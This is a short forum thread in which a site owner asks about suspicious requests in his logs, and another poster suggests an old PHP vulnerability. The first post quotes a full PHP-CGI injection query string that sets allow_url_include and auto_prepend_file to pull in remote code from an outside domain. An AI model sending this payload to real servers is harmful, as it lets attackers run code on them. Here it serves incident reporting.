|
2013-05-23, 03:41 PM | #1 |
Banned
Join Date: Oct 2003
Location: About to be evicted!!!!
Posts: 4,082
|
Anyone know what is going on here?
Looking at the logs for sorority-initiations.com I have a few hits to a page called:
/?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt (presumably http://sorority-initiations.com/?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt but my stats program removes the domain name before recording the page name) No page on my site is set up to accept a query string (Perl is used but only in include statements). I'm more than a little worried as http://gofastdownload.com/rf/s.txt appears to be a PHP command to load the content of another page on that domain, and gofastdownload.com is a newish registered domain on a Russian server. So I am assuming that my domain is being used by some asshole to do something shitty, but I have no idea what! Anyone any ideas? Thanks. |
2013-05-28, 02:23 AM | #2 |
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
Join Date: Dec 2012
Posts: 152
|
Did you find out what was going on?
I found this. Trying to exploit an old PHP hole? https://isc.sans.edu/diary/PHP+vulne...the+wild/13312 Last edited by lezinterracial; 2013-05-28 at 02:36 AM.. |
2013-05-28, 04:42 AM | #3 | |
Banned
Join Date: Oct 2003
Location: About to be evicted!!!!
Posts: 4,082
|
Quote:
|
|
|
|